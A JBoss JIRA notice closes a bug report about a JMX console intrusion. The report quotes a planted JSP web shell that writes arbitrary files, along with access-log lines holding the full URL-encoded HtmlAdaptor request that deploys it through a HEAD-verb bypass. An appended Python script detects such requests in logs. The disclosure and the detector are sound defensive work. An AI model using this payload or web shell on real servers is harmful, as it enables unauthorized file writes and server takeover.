[jboss-jira] [JBoss JIRA] (JBAS-9535) Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName
Arun Neelicattu (JIRA)
jira-events at lists.jboss.org
Thu Sep 19 22:35:03 EDT 2013
[ https://issues.jboss.org/browse/JBAS-9535?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Arun Neelicattu closed JBAS-9535.
---------------------------------
Resolution: Cannot Reproduce Bug
Closing this bug as it cannot be reproduced and there was no response from the reporter.
> Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName
> ------------------------------------------------------------------------
>
> Key: JBAS-9535
> URL: https://issues.jboss.org/browse/JBAS-9535
> Project: Application Server 3 4 5 and 6
> Issue Type: Bug
> Security Level: Public(Everyone can see)
> Components: JMX
> Affects Versions: JBossAS-5.1.0.GA
> Environment: CentOS 5.4
> Reporter: Mike Hansen
>
> I noticed a new deployment called myname.war with index.jsp which had the following inside:
> <%
> if(request.getParameter("f")!=null)
> (new java.io.FileOutputStream(application.getRealPath("\\") + request.getParameter("f"))).write(request.getParameter("t").getBytes()
> );
> %>
> mynameok
> I looked into my web server logs and found the following entry:
> ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
> I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but they've been unsuccessful so far.)
> Here is the complete log of the exploit as recorded by the webserver:
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /web-console/dtree.js HTTP/1.0" 302 - "http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /jmx-console/jboss.css HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET /invoker/JMXInvokerServlet HTTP/1.0" 200 3365 "http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 302 - "-" "-"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-" "Java/1.6.0_10-rc2"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
> ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 10.101.48.70 TLSv1 RC4-MD5 "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" -
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
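
Added example, not part of the original report or of JBoss code: a log-triage script for the pattern in the report above, which picks HtmlAdaptor invokeOpByName requests out of access_log-style lines, decodes the operation arguments and records the HTTP verb and status for review. The function names and the sample lines (documentation IP range, placeholder payload) are constructed for illustration; the ssl_request_log line format is not handled.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined format, optionally prefixed "file:" as grep prints it.
LINE_RE = re.compile(
    r'^(?:(?P<file>[^:\s]+):)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}|-)')

def parse_jmx_invocation(line):
    """Return details of an HtmlAdaptor invokeOpByName request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.lower().endswith("/htmladaptor"):
        return None
    pairs = parse_qsl(url.query, keep_blank_values=True)  # also URL-decodes
    first = dict(reversed(pairs))                          # first value of each key
    if first.get("action") != "invokeOpByName":
        return None
    args = [v for k, v in pairs if re.fullmatch(r"arg\d+", k)]
    reasons = []
    if "DeploymentFileRepository" in first.get("name", "") \
            and first.get("methodName") == "store":
        reasons.append("store() on DeploymentFileRepository creates a deployment file")
    if m["verb"] not in ("GET", "POST"):
        reasons.append("verb outside GET/POST (CVE-2010-0738 constraint bypass)")
    if any("<%" in a for a in args):
        reasons.append("argument carries JSP scriptlet markup")
    return {"ip": m["ip"], "time": m["ts"], "verb": m["verb"],
            "status": m["status"], "mbean": first.get("name"),
            "operation": first.get("methodName"), "args": args, "reasons": reasons}

def scan(lines):
    """Return every JMX console invocation found in an iterable of log lines."""
    return [hit for hit in map(parse_jmx_invocation, lines) if hit]

# Constructed sample lines (documentation IP range, placeholder payload).
_Q = ("action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository"
      "&methodName=store&argType=java.lang.String&arg0=example.war"
      "&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp"
      "&argType=java.lang.String&arg3=%3c%25+placeholder+%25%3e"
      "&argType=boolean&arg4=True")
SAMPLE = [
    'access_log.1:192.0.2.10 - - [16/Apr/2013:19:09:04 -0600] '
    '"HEAD /jmx-console/HtmlAdaptor?' + _Q + ' HTTP/1.0" 302 - "-" "-"',
    '192.0.2.10 - - [14/Apr/2013:20:10:29 -0600] '
    '"GET /jmx-console/jboss.css HTTP/1.0" 302 -',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit["time"], hit["ip"], hit["verb"], hit["status"], hit["reasons"])
```

The status column is kept in each hit so that requests answered with 401 can be separated from those that were not rejected.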